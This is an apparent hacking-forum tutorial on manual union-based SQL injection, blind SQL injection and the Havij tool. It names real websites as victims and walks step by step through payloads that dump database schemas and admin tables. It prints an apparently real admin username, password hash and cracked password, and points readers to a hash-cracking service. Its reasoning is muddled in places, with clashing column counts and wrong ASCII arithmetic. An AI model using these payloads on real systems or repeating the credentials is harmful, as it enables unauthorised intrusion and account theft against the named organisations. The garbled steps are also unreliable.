SQL Injection Manually (Full Tutorial with images)

Hello , today I will show you how much SQL i Can be Easy : )

Introduction :


What Is SQL i? ( SQL injection )
SQL injection is a basic in Web hacking , and its the first way to debut Exploiting sites .


How To Find SQLi Vuln Sites , & Inject Them :

This is very simple , just use that  dorks with a SQLi Scanner , Or Google then check every site by your self .


now to check manually is a site is SQLi vuln , just add ' at the end of the url :

For example , we have our target ,

Quote:http://www.cocobod.gh/news_details.php?id=30

now , we want to check if the is SQLi vuln , so we add ' at the end :

Quote:http://www.cocobod.gh/news_details.php?id=30'

if we got an error , that means that he is Vuln : )

So , now we move to next Step .

How To Find Columns Count :

after you have your vuln site , u need to know his columns count , to do it , just add "order by X--" at the end of the URL ,
X is a number from 1 to unlimited : d .

For example , we have our target server and we try to count columns ,
we add order by 1-- at the end , then order by 2-- *ect.. , always increase number till u got an error in your website like thise one :



So , in our target server , we have tryed this :

Quote:http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8-- *>> Unknown column

that means that the 5th column does not exist , that means that column count is 7 : D


How to Find The Acsessable Columns :


Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie "UNION SELECT number,of,columns--" like this :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

that means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .


How To Get MySQL DB Version :

we need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can't work on it , but every 5.x.x or above is exploitable : ) .
so to know MySQL DB Vesrion , just replace the number of the used column with "@@version"

for example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

that means that we can continue working on this site .


How To Find Database Name :


Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with "group_concat(schema_name)" , and add "from information_schema.schemata--" after the last column number , for example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--

now , to use the one the website use , replace "group_concat(schema_name)" with "concat(database())" for example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Congratz , you got the used DB : D .


How to Get The Table Names :


Now we need to get Table names , to do this , replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number .

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

How To Get Column Names :


To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()--

Example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--

How To Get Informations From Columns :


Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :

Quote:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--

So our exploit will be like this :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

now we need to decrypt the password that is crypted in md5 ,
go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you will get the pass like here : )



comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682

username : comaster
password : cocoadmin4682

We have successfully injected a website , and got the admin info

Blind SQL Injection (Full Tutorial)

Hey guys in this tut i will tell you how to hack a website with Blind SQL Injection.
I mostly use ordinary SQL Injection myself but sometimes the "union" command don't work or we don't get a versions name
thats why Blind SQL Injection is important too.
ok lets start
first find your victim site. Blind SQL Injections works often on ordinary SQL Injection vulnerable pages too.

well our victim in this tutorial is : http://www.blind-sql-injection-tut.com/index.php?id=7

Testing if our Victims is vulnerable :

now we have to test if our victim is vulnerable for Blind SQL Injection.
add this

and 1=0

example url : http://www.blind-sql-injection-tut.com/index.php?id=7 and 1 = 0
now we should get a error.

now add

and 1 = 1

example url : http://www.blind-sql-injection-tut.com/index.php?id=7 and 1 = 1

Now we will see the website without a error message.
That means that our victim is vulnerable

Find out MySQL version

Now you have to add and

SUBSTRING(version(),1,1)=5

if you see the website whitout a error the version is 5.
If you get a error try 4 or 3

Lets do the Injection

The way to do the injection is a bit different to the ordinary way. We don't search for tables etc we only try to get
the password. First we try to get the first letter of the password. You will need this Asci Table
use this

and ascii(substring((SELECT password from users limit 0,1),1,1))>70

we get a error the asci is to high lets try some lower value
try

and ascii(substring((SELECT password from users limit 0,1),1,1))>64

no we don't get a error that means that the asci value is higher then 64
lets try 86

and ascii(substring((SELECT password from users limit 0,1),1,1))>66

no we get a error . That means our asci is to high. But we no that we didn't got a error at 85 that means our asci is 65.
Now check 85 in asci table. 65 means "A" that means that the first letter of our password is "A"

now we have to get the second latter.

and ascii(substring((SELECT password from users limit 0,1),2,1))>80

result : error (to high)

and ascii(substring((SELECT password from users limit 0,1),2,1))>75

result : no error (to low)

and ascii(substring((SELECT password from users limit 0,1),2,1))>76

result : error
no we know that the second letter of the password is in asci 75. Open your asci table and check which latter that is
75 = K
now we know the first two letters of the password : AK

well i think you know now how it works to get the next letters you only have to change : 2,1 into 3,1

example :
first letter : "and ascii(substring((SELECT password from users limit 0,1),1,1))>70"
second lettter : "and ascii(substring((SELECT password from users limit 0,1),2,1))>70"
third letter : "and ascii(substring((SELECT password from users limit 0,1),3,1))>70"

SQL Injection through Havij (Full Tutorial)

Firstly i am going to introduce the term havij :)

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Download havij 1.10

First Find a sqli infected site .Now here i found a vulernable site

http://www.hypetrading.com/productinfo.php?id=285

Now Let's start

Open havij and copy and paste infected link as shown in figure

Now click in the "Analyze"
Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

In that Just put mark username and password and click "Get data"

Bingo Got now id and pass that may be admin...

The pass will get as md5 you can crack it also using this tool as shown in figure...